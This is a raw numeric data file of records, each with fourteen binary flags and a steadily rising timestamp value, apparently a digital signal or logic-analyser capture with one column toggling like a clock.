0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9529772e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9529796e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9529820e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9529844e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9529872e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9529896e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9529924e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9529948e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9529972e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9529996e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9530020e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9530044e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9530072e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.9654252e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,1.9654484e-02 1,0,1,0,0,0,0,0,0,0,0,1,0,1,1.9654512e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,1.9654532e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,1,1.9654844e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,1.9654868e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,1,1.9654892e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,1.9654916e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,1,1.9654968e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,1.9654992e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,1,1.9654996e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,1,1.9655044e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,1,1.9655068e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,1.9655076e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,1,1.9655116e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,1.9655140e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9655148e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9655168e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9655192e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9655216e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9655244e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9655292e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9655316e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9655324e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9655368e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9655392e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9655396e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9655420e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9655444e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9655468e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9655492e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9655516e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9655540e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9655548e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9655592e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9655620e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9655640e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9655664e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9655668e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9655716e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9655740e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9655748e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9655764e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9655788e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9655812e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9655840e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9655864e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9655892e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9655916e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9655940e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9655964e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9655988e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9656012e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9656040e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9656064e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9656092e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9656116e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9656140e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9656188e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9656212e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9656220e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9656268e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9656292e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,1.9656296e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9656300e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9656340e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9656364e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9656388e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9656412e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9656440e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9656464e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9656492e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9656516e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9656540e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9656564e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9656592e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9656616e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9656644e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9656668e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9656692e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9656716e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9656740e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9656764e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9656792e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9656820e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9656844e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9656868e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9656872e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9656916e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9656940e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9656948e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9656968e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9656996e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9657020e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9657044e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9657068e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9657092e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9657096e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9657140e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9657168e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9657172e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9657196e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9657216e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9657268e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9657292e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9657300e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9657316e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9657340e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9657348e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9657372e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9657396e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9657420e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9657444e-02 1,0,1,0,0,0,0,0,0,1,0,0,0,0,1.9657448e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9657452e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9657496e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9657520e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,1.9657524e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9657528e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9657544e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9657572e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9657596e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9657620e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9657668e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9657692e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9657700e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9657720e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9657744e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9657772e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9657796e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9657820e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9657844e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9657868e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9657892e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9657900e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9657948e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9657972e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9657996e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9658020e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9658044e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9658068e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9658092e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9658120e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9658144e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9658172e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9658196e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9658220e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9658244e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9658268e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9658292e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9658320e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9658344e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9658372e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9658420e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9658448e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,1.9658452e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9658456e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9658500e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9658524e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9658528e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9658548e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9658572e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9658596e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9658620e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9658648e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9658672e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,1.9658676e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9658680e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9658724e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9658748e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9658772e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9658796e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9658820e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9658848e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9658872e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9658896e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9658924e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9658948e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9658952e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9658996e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9659020e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9659028e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9659048e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9659072e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9659096e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9659124e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9659148e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9659172e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9659196e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9659220e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9659248e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9659272e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9659300e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9659324e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9659372e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9659396e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9659404e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9659420e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9659444e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9659472e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9659496e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9659524e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9659548e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9659552e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9659596e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9659620e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9659628e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9659672e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9659700e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9659724e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9659748e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9659772e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9659796e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9659820e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9659844e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9659852e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9659900e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9659924e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9659948e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9659972e-02 1,0,1,0,0,0,0,0,0,1,0,0,0,0,1.9659976e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9659980e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9660020e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9660048e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9660052e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9660072e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9660096e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9660124e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9660144e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9660196e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9660220e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9660228e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9660244e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9660272e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9660276e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9660296e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9660320e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9660344e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9660372e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9660396e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9660420e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9660444e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9660468e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9660520e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9660544e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9660548e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9660596e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9660620e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9660628e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9660668e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9660700e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9660720e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9660744e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9660772e-02 1,0,1,0,0,0,0,0,0,1,0,0,0,0,1.9660796e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9660800e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9660844e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9660868e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9660876e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9660920e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9660944e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9660948e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9660972e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9660996e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9661020e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9661044e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.9661068e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.9661092e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9661100e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9661148e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9661172e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9661196e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9661220e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9661244e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9661268e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9661292e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9661320e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9661344e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9661372e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9661396e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9661420e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9661444e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9661468e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9661496e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9661520e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9661544e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9661572e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9661596e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9661620e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9661644e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9661672e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9661700e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9661724e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9661744e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9661772e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9661796e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9661820e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9661848e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9661872e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9661896e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9661924e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9661948e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9661972e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.9662000e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.9662024e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,1.9786220e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.9786404e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,1.9786424e-02 0,1,1,0,0,0,0,0,0,0,0,1,0,1,1.9786452e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,1.9786476e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,1,1.9786768e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,1.9786792e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,1,1.9786820e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,1.9786844e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,1,1.9786868e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,1.9786892e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,1,1.9786916e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,1.9786944e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,1,1.9786968e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,1.9786992e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,1,1.9786996e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,1.9787000e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,1,1.9787044e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9787052e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9787068e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9787092e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9787116e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9787124e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9787144e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9787168e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9787192e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9787220e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9787224e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9787244e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9787268e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9787292e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9787316e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9787344e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9787368e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9787372e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9787420e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9787444e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9787452e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9787468e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9787492e-02 0,1,1,0,0,0,0,0,0,1,0,0,0,0,1.9787496e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9787500e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9787540e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9787568e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,1.9787572e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9787576e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9787592e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9787620e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9787644e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9787668e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9787692e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9787716e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9787740e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9787768e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9787792e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9787820e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9787844e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9787868e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9787892e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9787916e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9787940e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9787968e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9787972e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9787992e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9788020e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9788044e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9788068e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9788092e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9788116e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9788124e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9788168e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9788192e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9788220e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9788244e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9788268e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9788292e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9788316e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9788344e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9788372e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9788396e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9788420e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9788444e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9788468e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9788492e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9788520e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9788544e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9788572e-02 